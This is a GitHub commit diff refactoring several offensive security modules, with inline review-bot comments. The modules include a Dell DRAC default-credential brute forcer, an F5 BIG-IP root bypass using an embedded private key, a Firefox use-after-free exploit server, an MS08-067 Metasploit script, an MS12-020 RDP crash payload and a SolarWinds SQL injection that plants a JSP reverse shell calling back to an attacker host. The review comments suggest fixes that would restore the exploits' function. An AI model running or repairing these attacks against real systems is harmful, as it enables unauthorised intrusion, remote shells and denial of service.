Merge pull request #258 from Cabalist/master

Code Review
This commit is contained in:
trustedsec 2016-07-30 14:14:42 -04:00 committed by GitHub
commit 133a6f7bfa
16 changed files with 851 additions and 1089 deletions


@ -0,0 +1 @@
# coding=utf-8


@ -1,30 +1,38 @@
#!/usr/bin/env python
# coding=utf-8
#
#
# Metasploit Autopwn functionality
#
#
from src.core import setcore
import os
import pexpect
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# this will load the database
def prep(database, ranges):
print("\n")
setcore.PrintStatus(
"Prepping the answer file based on what was specified.")
core.print_status("Prepping the answer file based on what was specified.")
# prep the file to be written
filewrite = open("src/program_junk/autopwn.answer", "w")
setcore.PrintStatus("Using the " + database + "sql driver for autopwn")
filewrite.write("db_driver " + database + "\r\n")
setcore.PrintStatus("Autopwn will attack the following systems: " + ranges)
filewrite.write("db_nmap " + ranges + "\r\n")
filewrite.write("db_autopwn -p -t -e -r\r\n")
filewrite.write("jobs -K\r\n")
filewrite.write("sessions -l\r\n")
filewrite.close()
setcore.PrintStatus(
"Answer file has been created and prepped for delivery into Metasploit.\n")
with open("src/program_junk/autopwn.answer", "w") as filewrite:
core.print_status("Using the {0} sql driver for autopwn".format(database))
filewrite.write("db_driver {0}\r\n".format(database))
core.print_status("Autopwn will attack the following systems: {0}".format(ranges))
filewrite.write("db_nmap {0}\r\n".format(ranges))
filewrite.write("db_autopwn -p -t -e -r\r\n")
filewrite.write("jobs -K\r\n")
filewrite.write("sessions -l\r\n")
core.print_status("Answer file has been created and prepped for delivery into Metasploit.\n")
def launch():
@ -33,30 +41,27 @@ def launch():
if path variables aren't set for msfconsole this will break, even if its specified in set_config """
# launch the attack
setcore.PrintStatus(
"Launching Metasploit and attacking the systems specified. This may take a moment..")
core.print_status("Launching Metasploit and attacking the systems specified. This may take a moment..")
# try/catch block
try:
child = pexpect.spawn(
"%msfconsole -r %s/autopwn.answer\r\n\r\n" % (meta_path, setdir))
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path, 'msfconsole'),
os.path.join(core.setdir, "autopwn.answer")))
child.interact()
# handle exceptions and log them
except Exception as error:
setcore.log(error)
core.log(error)
def do_autopwn():
print('Doing do_autopwn')
# pull the metasploit database
database = setcore.meta_database()
range = input(setcore.setprompt(
["19", "20"], "Enter the IP ranges to attack (nmap syntax only)"))
database = core.meta_database()
ip_range = input(core.setprompt(["19", "20"], "Enter the IP ranges to attack (nmap syntax only)"))
# prep the answer file
prep(database, range)
confirm_attack = input(setcore.setprompt(
["19", "20"], "You are about to attack systems are you sure [y/n]"))
prep(database, ip_range)
confirm_attack = input(core.setprompt(["19", "20"], "You are about to attack systems are you sure [y/n]"))
# if we are sure, then lets do it
if confirm_attack == "yes" or confirm_attack == "y":
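Review bot: `os.path.join(core.meta_path, 'msfconsole')` in launch() uses `core.meta_path` as a path component, but the mssql module in this same commit calls it as a function (`msf_path = core.meta_path()`); if it is a function here as well, the join raises TypeError, the surrounding `except Exception` merely logs it and msfconsole never starts. If so the fix is `os.path.join(core.meta_path(), 'msfconsole')`, and `core.setdir` deserves the same check. Note also that prep() writes the answer file to `src/program_junk/autopwn.answer` while launch() reads `os.path.join(core.setdir, "autopwn.answer")`; unless setdir resolves to that directory the two paths disagree. launch()'s body begins outside the hunk.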


@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
###########################################
#
@ -12,13 +13,25 @@
# @TrustedSec
#
##########################################
from urllib import *
import re
import threading
import sys
import time
class bcolors:
try: # Py2
from urllib import urlencode, urlopen
except ImportError: # Py3
from urllib.request import urlopen
from urllib.parse import urlencode
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
class bcolors(object):
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
@ -58,62 +71,33 @@ class bcolors:
self.backWhite = ''
self.DARKCYAN = ''
print("\n")
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("Fast-Track DellDRAC and Dell Chassis Discovery and Brute Forcer")
print("")
print("Written by Dave Kennedy @ TrustedSec")
print("https://www.trustedsec.com")
print("@TrustedSec and @HackingDave")
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("")
print("This attack vector can be used to identify default installations")
print("of Dell DRAC and Chassis installations. Once found, you can use")
print("the remote administration capabilties to mount a virtual media")
print("device and use it to load for example Back|Track or password")
print("reset iso. From there, add yourself a local administrator account")
print("or dump the SAM database. This will allow you to compromise the")
print("entire infrastructure. You will need to find a DRAC instance that")
print("has an attached server and reboot it into the iso using the virtual")
print("media device.")
print("")
print("Enter the IP Address or CIDR notation below. Example: 192.168.1.1/24")
print("")
ipaddr = raw_input("Enter the IP or CIDR: ")
# try logging into DRAC, chassis is something different
def login_drac(ipaddr_single):
# default post string
url = "https://%s/Applications/dellUI/RPC/WEBSES/create.asp" % (
ipaddr_single)
url = "https://{0}/Applications/dellUI/RPC/WEBSES/create.asp".format(ipaddr_single)
# post parameters
opts = {
"WEBVAR_PASSWORD": "calvin",
"WEBVAR_USERNAME": "root",
"WEBVAR_ISCMCLOGIN": 0
}
opts = {"WEBVAR_PASSWORD": "calvin",
"WEBVAR_USERNAME": "root",
"WEBVAR_ISCMCLOGIN": 0}
# URL encode it
data = urlencode(opts)
# our headers to pass (taken from raw post)
headers = {
# "Host": "10.245.196.52",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/Applications/dellUI/login.htm" % (ipaddr_single),
"Content-Length": 63,
"Cookie": "test=1; SessionLang=EN",
"Pragma": "no-cache",
"Cache-Control": "no-cache"
}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
# "Host": "10.245.196.52",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://{0}/Applications/dellUI/login.htm".format(ipaddr_single),
"Content-Length": 63,
"Cookie": "test=1; SessionLang=EN",
"Pragma": "no-cache",
"Cache-Control": "no-cache"}
# request the page
#req = urlopen(url, data, headers)
try:
# capture the response
response = urlopen(url, data, headers, timeout=2)
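Review bot: `urlopen(url, data, headers, timeout=2)` passes the headers dict in the third positional slot, but `urllib.urlopen` (the Py2 branch) has no `timeout` parameter at all and `urllib.request.urlopen` (the Py3 branch) takes `timeout` as its third positional, so the call raises TypeError under both import branches and the bare `except: pass` below swallows it — neither probe ever reaches the network. Headers belong on a `Request` object, as the commented-out `#req = urlopen(url, data, headers)` line hints: build `req = Request(url, data, headers)` and call `urlopen(req, timeout=2)`, importing `Request` from `urllib2`/`urllib.request` in the two branches. Under the Py3 imports this commit adds, `data` must also be bytes (`urlencode(opts).encode()`), as the solarwinds module in this same commit already does. login_chassis has the identical call and except block; login_drac's body continues outside the hunk.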
@ -124,50 +108,49 @@ def login_drac(ipaddr_single):
# Failure_No_Free_Slot means there are no sessions available need to
# log someone off
if "Failure_No_Free_Slot" in data:
print((bcolors.YELLOW + "[!]" + bcolors.ENDC +
" There are to many people logged but un: root and pw: calvin are legit on IP: " % (ipaddr_single)))
print(("{0}[!]{1} There are to many people logged but un: root and pw: calvin are legit on IP: {2}".format(bcolors.YELLOW,
bcolors.ENDC,
ipaddr_single)))
global global_check1
global_check1 = 1
# if we are presented with a username back, we are golden
if "'USERNAME' : 'root'" in data:
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" Dell DRAC compromised! username: root and password: calvin for IP address: " + ipaddr_single))
print("{0}[*]{1} Dell DRAC compromised! username: root and password: calvin for IP address: {2}".format(bcolors.GREEN,
bcolors.ENDC,
ipaddr_single))
global global_check2
global_check2 = 1
# handle failed attempts and move on
except:
pass
# these are for the centralized dell chassis
def login_chassis(ipaddr_single):
# our post URL
url = "https://%s/cgi-bin/webcgi/login" % (ipaddr_single)
url = "https://{0}/cgi-bin/webcgi/login".format(ipaddr_single)
# our post parameters
opts = {
"WEBSERVER_timeout": "1800",
"user": "root",
"password": "calvin",
"WEBSERVER_timeout_select": "1800"
}
opts = {"WEBSERVER_timeout": "1800",
"user": "root",
"password": "calvin",
"WEBSERVER_timeout_select": "1800"}
# url encode
data = urlencode(opts)
# headers (taken from raw POST)
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/cgi-bin/webcgi/login" % (ipaddr_single),
"Content-Length": 78
}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://{0}/cgi-bin/webcgi/login".format(ipaddr_single),
"Content-Length": 78}
# request the page
#req = Request(url, data, headers)
# req = Request(url, data, headers)
try:
# capture the response
response = urlopen(url, data, headers, timeout=2)
@ -177,15 +160,17 @@ def login_chassis(ipaddr_single):
pass # login failed
# to many people logged in at a given time
if 'Connection refused, maximum sessions already in use.' in data:
print((bcolors.YELLOW + "[!]" + bcolors.ENDC +
" There are to many people logged but un: root and pw: calvin are legit on IP: " + (ipaddr_single)))
print(("{0}[!]{1} There are to many people logged but un: root and pw: calvin are legit on IP: {2}".format(bcolors.YELLOW,
bcolors.ENDC,
ipaddr_single)))
global global_check3
global_check3 = 1
# successful guess of passwords
if "/cgi-bin/webcgi/index" in data:
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" Dell Chassis Compromised! username: root password: calvin for IP address: " + ipaddr_single))
print("{0}[*]{1} Dell Chassis Compromised! username: root password: calvin for IP address: {2}".format(bcolors.GREEN,
bcolors.ENDC,
ipaddr_single))
global global_check4
global_check4 = 1
@ -193,6 +178,7 @@ def login_chassis(ipaddr_single):
except:
pass
# this will check to see if we are using
# a valid IP address for scanning
@ -234,25 +220,24 @@ def is_valid_ip(ip):
""", re.VERBOSE | re.IGNORECASE)
return pattern.match(ip) is not None
# convert to 32 bit binary from standard format
# convert to 32 bit binary from standard format
def ip2bin(ip):
b = ""
inQuads = ip.split(".")
outQuads = 4
for q in inQuads:
in_quads = ip.split(".")
out_quads = 4
for q in in_quads:
if q != "":
b += dec2bin(int(q), 8)
outQuads -= 1
while outQuads > 0:
out_quads -= 1
while out_quads > 0:
b += "00000000"
outQuads -= 1
out_quads -= 1
return b
# decimal to binary conversion
def dec2bin(n, d=None):
s = ""
while n > 0:
@ -268,53 +253,49 @@ def dec2bin(n, d=None):
s = "0"
return s
# convert a binary string into an IP address
def bin2ip(b):
ip = ""
for i in range(0, len(b), 8):
ip += str(int(b[i:i + 8], 2)) + "."
return ip[:-1]
# print a list of IP addresses based on the CIDR block specified
def scan(ipaddr):
if "/" in ipaddr:
parts = ipaddr.split("/")
baseIP = ip2bin(parts[0])
base_ip = ip2bin(parts[0])
subnet = int(parts[1])
if subnet == 32:
ipaddr = bin2ip(baseIP)
ipaddr = bin2ip(base_ip)
else:
# our base ip addresses for how many we are going to be scanning
counter = 0
# capture the threads
threads = []
ipPrefix = baseIP[:-(32 - subnet)]
for i in range(2**(32 - subnet)):
ipaddr_single = bin2ip(ipPrefix + dec2bin(i, (32 - subnet)))
ip_prefix = base_ip[:-(32 - subnet)]
for i in range(2 ** (32 - subnet)):
ipaddr_single = bin2ip(ip_prefix + dec2bin(i, (32 - subnet)))
# if we are valid proceed
ip_check = is_valid_ip(ipaddr_single)
if ip_check != False:
if ip_check:
# do this to limit how fast it can scan, anything more
# causes CPU to hose
if counter > 255:
# put a small delay in place
time.sleep(0.1)
# increase counter until 255 then delay 0.1
counter = counter + 1
counter += 1
# start our drac BF
thread = threading.Thread(
target=login_drac, args=(ipaddr_single,))
thread = threading.Thread(target=login_drac, args=(ipaddr_single,))
# create a list of our threads in a dictionary
threads.append(thread)
# start the thread
thread.start()
# same as above just on the chassis
thread = threading.Thread(
target=login_chassis, args=(ipaddr_single,))
thread = threading.Thread(target=login_chassis, args=(ipaddr_single,))
# append the thread
threads.append(thread)
# start the thread
@ -325,15 +306,38 @@ def scan(ipaddr):
thread.join()
# if we are using a single IP address then just do this
if not "/" in ipaddr:
if "/" not in ipaddr:
login_drac(ipaddr)
login_chassis(ipaddr)
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" Scanning IP addresses, this could take a few minutes depending on how large the subnet range..."))
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" As an example, a /16 can take an hour or two.. A slash 24 is only a couple seconds. Be patient."))
print("\n")
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("Fast-Track DellDRAC and Dell Chassis Discovery and Brute Forcer")
print("")
print("Written by Dave Kennedy @ TrustedSec")
print("https://www.trustedsec.com")
print("@TrustedSec and @HackingDave")
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("")
print("This attack vector can be used to identify default installations")
print("of Dell DRAC and Chassis installations. Once found, you can use")
print("the remote administration capabilties to mount a virtual media")
print("device and use it to load for example Back|Track or password")
print("reset iso. From there, add yourself a local administrator account")
print("or dump the SAM database. This will allow you to compromise the")
print("entire infrastructure. You will need to find a DRAC instance that")
print("has an attached server and reboot it into the iso using the virtual")
print("media device.")
print("")
print("Enter the IP Address or CIDR notation below. Example: 192.168.1.1/24")
print("")
ipaddr = input("Enter the IP or CIDR: ")
print("{0}[*]{1} Scanning IP addresses, this could take a few minutes depending on how large the subnet range...".format(bcolors.GREEN,
bcolors.ENDC))
print("{0}[*]{1} Asan example, a /16 can take an hour or two.. A slash 24 is only a couple seconds. Be patient.".format(bcolors.GREEN,
bcolors.ENDC))
# set global variables to see if we were successful
global_check1 = 0
@ -343,12 +347,11 @@ global_check4 = 0
# kick off the scan
scan(ipaddr)
if global_check1 or global_check2 or global_check3 or global_check4 == 1:
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" DellDrac / Chassis Brute Forcer has finished scanning. Happy Hunting =)"))
if any([global_check1, global_check2, global_check3, global_check4]):
print(("{0}[*]{1} DellDrac / Chassis Brute Forcer has finished scanning. Happy Hunting =)".format(bcolors.GREEN,
bcolors.ENDC)))
else:
print((bcolors.RED + "[!]" + bcolors.ENDC +
" Sorry, unable to find any of the Dell servers with default creds..Good luck :("))
print(("{0}[!]{1} Sorry, unable to find any of the Dell servers with default creds..Good luck :(".format(bcolors.RED,
bcolors.ENDC)))
raw_input("Press {return} to exit.")
input("Press {return} to exit.")


@ -0,0 +1 @@
# coding=utf-8


@ -1,4 +1,5 @@
#!/usr/bin/python
# coding=utf-8
#
# Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
#
@ -6,35 +7,35 @@
# http://www.trustedsec.com
#
#
import subprocess
import os
import subprocess
filewrite = open("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----""")
filewrite.close()
subprocess.Popen("chmod 700 priv.key", shell=True).wait()
print("""
Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
try:
with open("priv.key", 'w') as filewrite:
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----""")
subprocess.Popen("chmod 700 priv.key", shell=True).wait()
print("""
Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
http://www.trustedsec.com
""")
ipaddr = input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()
if os.path.isfile("priv.key"):
os.remove("priv.key")
Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
http://www.trustedsec.com
""")
ipaddr = input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@{0}".format(ipaddr), shell=True).wait()
finally:
if os.path.isfile("priv.key"):
os.remove("priv.key")
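Review bot: Both subprocess calls still use `shell=True` with a command string, and the second interpolates the operator-typed `ipaddr` into it, so any shell metacharacter in the input is interpreted by the shell instead of being handed to ssh. The argument-list form needs no shell: `subprocess.Popen(["ssh", "-i", "priv.key", "root@{0}".format(ipaddr)]).wait()`, and the chmod is a stdlib one-liner, `os.chmod("priv.key", 0o700)`. The key file is also created under the default umask and only restricted afterwards; creating it with `os.open("priv.key", os.O_WRONLY | os.O_CREAT, 0o600)` and wrapping the fd with `os.fdopen` removes that window.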


@ -1,14 +1,10 @@
#!/usr/bin/env python
# coding=utf-8
# Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) by Mr_Me
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
import sys
try:
import psyco
psyco.full()
except ImportError:
pass
try: # Py2
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
except ImportError: # Py3
from http.server import BaseHTTPRequestHandler, HTTPServer
class myRequestHandler(BaseHTTPRequestHandler):
@ -143,13 +139,13 @@ trigger();
</html>
""")
self.wfile.write(
"""<title>Please wait...</title></head><body>""")
self.wfile.write("""<title>Please wait...</title></head><body>""")
self.wfile.write("""<left><body bgcolor="Black"><font color="White">
Please wait<br>""")
print((
"\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 4444 [-]" % (target)))
print(("\n\n[-] Exploit sent... [-]\n"
"[-] Wait about 30 seconds and attempt to connect.[-]\n"
"[-] Connect to IP Address: {0} and port 4444 [-]".format(target)))
# Print custom HTTP Response
def printCustomHTTPResponse(self, respcode):
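Review bot: `self.wfile.write("""<title>Please wait...</title></head><body>""")` writes a str, but under the `http.server` import branch this commit adds, `wfile` is a binary stream and the call raises TypeError; the other `wfile.write` calls in this handler have the same problem. The writes need bytes, e.g. `self.wfile.write(b"""<title>Please wait...</title></head><body>""")` or `.encode()` on the assembled page. That failure is then hidden by the handler's `except:` in the next hunk, which this commit widens from `except Exception:` to a bare except; the narrower form should stay, otherwise a KeyboardInterrupt raised inside the handler is swallowed as well. The method enclosing these writes starts outside the hunk.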
@ -159,20 +155,21 @@ trigger();
self.end_headers()
# In case of exceptions, pass them
except Exception:
except:
pass
httpd = HTTPServer(('', 80), myRequestHandler)
print ("""
print("""
#####################################################################################
# Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) by Mr. Me. #
#####################################################################################
""")
print (" [-] Starting Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) [-]")
print (" [-] Have someone connect to you on port 80 [-]")
print ("\n\n <ctrl>-c to Cancel")
print(" [-] Starting Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) [-]")
print(" [-] Have someone connect to you on port 80 [-]")
print("\n\n <ctrl>-c to Cancel")
try:
# handle the connections
@ -181,4 +178,4 @@ try:
httpd.serve_forever()
# Except Keyboard Interrupts and throw custom message
except KeyboardInterrupt:
print ("\n\n Exiting exploit...\n\n")
print("\n\n Exiting exploit...\n\n")


@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
#
#
# This has been redesigned to use the MS08-067 in Metasploit which is much more reliable.
@ -6,19 +7,35 @@
#
#
import subprocess
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
def create_rc(revhost, victim, payload, port):
filewrite = file("/root/.set/ms08-067.rc", "w")
filewrite.write("use exploit/windows/smb/ms08_067_netapi\nset payload %s\nset RHOST %s\nset LPORT %s\nset LHOST %s\nexploit\n\n" % (payload, victim, port, revhost))
filewrite.close()
with open("/root/.set/ms08-067.rc", "w") as filewrite:
filewrite.write("use exploit/windows/smb/ms08_067_netapi\n"
"set payload {0}\n"
"set RHOST {1}\n"
"set LPORT {2}\n"
"set LHOST {3}\n"
"exploit\n\n".format(payload, victim, port, revhost))
def launch_msf():
subprocess.Popen("msfconsole -r /root/.set/ms08-067.rc", shell=True).wait()
subprocess.Popen("msfconsole -r /root/.set/ms08-067.rc", shell=True).wait()
revhost = raw_input("Enter your LHOST (attacker IP address) for the reverse listener: ")
revport = raw_input("Enter your LPORT (attacker port) for the reverse listener: ")
victim = raw_input("Enter the RHOST (victim IP) for MS08-067: ")
payload = raw_input("Enter your payload (example: windows/meterpreter/reverse_https) - just hit enter for reverse_https: ")
if payload == (""): payload = ("windows/meterpreter/reverse_https")
revhost = input("Enter your LHOST (attacker IP address) for the reverse listener: ")
revport = input("Enter your LPORT (attacker port) for the reverse listener: ")
victim = input("Enter the RHOST (victim IP) for MS08-067: ")
payload = input("Enter your payload (example: windows/meterpreter/reverse_https) - just hit enter for reverse_https: ")
if not payload:
payload = "windows/meterpreter/reverse_https"
# create the rc file
create_rc(revhost, victim, payload, revport)
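Review bot: create_rc has no docstring and writes to the hard-coded `/root/.set/ms08-067.rc`, whereas the other modules in this commit derive their working directory from `core.setdir`; a docstring such as `"""Write the msfconsole resource script for MS08-067 to /root/.set/ms08-067.rc."""` would at least make the fixed path visible to callers. launch_msf is defined but never called in the visible lines; if the script is meant to start the console after writing the rc file, the `launch_msf()` call is missing after `create_rc(...)`. The hunk ends at the end of the visible file, so I cannot tell whether more follows.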


@ -1,4 +1,5 @@
#!/usr/bin/python
# coding=utf-8
#
#
# This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
@ -11,6 +12,13 @@
#
import subprocess
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("""
This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
@ -25,6 +33,5 @@ work, then its not vulnerable.
""")
ipaddr = input("Enter the IP address of the mysql server: ")
while 1:
subprocess.Popen("mysql --host=%s -u root mysql --password=blah" %
(ipaddr), shell=True).wait()
while True:
subprocess.Popen("mysql --host={0} -u root mysql --password=blah".format(ipaddr), shell=True).wait()
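Review bot: The mysql command is still assembled as a shell string with the operator-typed `ipaddr` interpolated into it, so shell metacharacters in the input are interpreted; the list form needs no shell: `subprocess.Popen(["mysql", "--host={0}".format(ipaddr), "-u", "root", "mysql", "--password=blah"]).wait()`. The `while True` loop also has no exit other than an unhandled KeyboardInterrupt traceback; wrapping the loop in `try: ... except KeyboardInterrupt: pass` ends it cleanly, as the firefox module in this commit does for its server loop.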


@ -1,3 +1,4 @@
# coding=utf-8
# Exploit Title: Pakyu Cenloder
# Date: March 16 2012
# Author: BMario
@ -12,19 +13,50 @@
# CVE : MS12-020
import socket
import sys
import binascii
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("Microsoft Terminal Services / Remote Desktop Services - Denial of Service")
headpack = "030000130ee000000000000100080000000000".decode('hex')
dafuq = "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".decode(
'hex')
dafree = "0300000802f08028".decode('hex')
headpack = binascii.hexlify(b"030000130ee000000000000100080000000000")
dafuq = b"030001d602f0807f658201940401010401010101f" \
b"f3019020400000000020400000002020400000000" \
b"0204000000010204000000000204000000010202f" \
b"fff02040000000230190204000000010204000000" \
b"01020400000001020400000001020400000000020" \
b"40000000102020420020400000002301c0202ffff" \
b"0202fc170202ffff0204000000010204000000000" \
b"204000000010202ffff0204000000020482013300" \
b"0500147c0001812a000800100001c000447563618" \
b"11c01c0d800040008008002e00101ca03aa090400" \
b"00ce0e000048004f0053005400000000000000000" \
b"00000000000000000000000000000000004000000" \
b"000000000c0000000000000000000000000000000" \
b"00000000000000000000000000000000000000000" \
b"00000000000000000000000000000000000000000" \
b"00000000000000000000001ca0100000000001000" \
b"07000100300030003000300030002d00300030003" \
b"0002d0030003000300030003000300030002d0030" \
b"00300030003000300000000000000000000000000" \
b"000000000000000000000000004c00c000d000000" \
b"0000000002c00c001b0000000000000003c02c000" \
b"3000000726470647200000000008080636c697072" \
b"6472000000a0c0726470736e640000000000c0"
dafuq = binascii.hexlify(dafuq)
dafree = binascii.hexlify(b"0300000802f08028")
trololo = headpack + dafuq + dafree
#HOSTNYO = sys.argv[1]
HOSTNYO = raw_input("Enter the IP address to crash (remote desktop): ")
HOSTNYO = input("Enter the IP address to crash (remote desktop): ")
PORTNYO = 3389
for i in range(10240):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
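Review bot: `binascii.hexlify` is not the replacement for the removed `.decode('hex')` calls: hexlify turns bytes into their ASCII hex text, whereas `.decode('hex')` turned hex text into raw bytes, so `headpack`, `dafuq` and `dafree` are now doubly-encoded hex strings rather than the byte sequences the previous version built. The inverse, `binascii.unhexlify(b"...")`, is the Py2/3-portable equivalent of the old calls. The `for i in range(10240)` loop that consumes `trololo` continues outside the hunk.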


@ -1,4 +1,5 @@
#!/usr/bin/python
# coding=utf-8
##########################################################################
# Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit
# Date: May 2nd 2012
@ -11,10 +12,25 @@
##########################################################################
import urllib
import http.cookiejar
import sys
import ntpath
import random
import binascii
try: # Py2
from cookielib import CookieJar
from urllib2 import build_opener, HTTPCookieProcessor
from urllib import urlencode
except ImportError: # Py3
from http.cookiejar import CookieJar
from urllib.request import build_opener, HTTPCookieProcessor
from urllib.parse import urlencode
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("\n[*] Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit")
print("[*] Vulnerability discovered by Digital Defence - DDIVRT-2011-39")
@ -25,9 +41,9 @@ print("[*] Offensive Security - http://www.offensive-security.com\n")
# print "[*] Usage: solarshell.py <RHOST> <LHOST> <LPORT>"
# exit(0)
#rhost = sys.argv[1]
#lhost = sys.argv[2]
#lport = sys.argv[3]
# rhost = sys.argv[1]
# lhost = sys.argv[2]
# lport = sys.argv[3]
rhost = input("Enter the remote host IP address: ")
lhost = input("Enter the attacker IP address: ")
@ -38,7 +54,7 @@ for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890', 6):
filename += i
filename += ".jsp"
output_path = "c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/%s" % filename
output_path = ntpath.join("c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/", filename)
jsp = '''<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
@ -47,74 +63,72 @@ jsp = '''<%@page import="java.lang.*"%>
<%
class StreamConnector extends Thread
{
{{
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os )
{
{{
this.is = is;
this.os = os;
}
}}
public void run()
{
{{
BufferedReader in = null;
BufferedWriter out = null;
try
{
{{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
{{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
}}
}} catch( Exception e ){{}}
try
{
{{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
}} catch( Exception e ){{}}
}}
}}
try
{
Socket socket = new Socket( "''' + lhost + '''", ''' + lport + ''');
{{
Socket socket = new Socket( "''{lhost}''", ''{lport}'');
Process process = Runtime.getRuntime().exec( "cmd.exe" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>'''
}} catch( Exception e ) {{}}
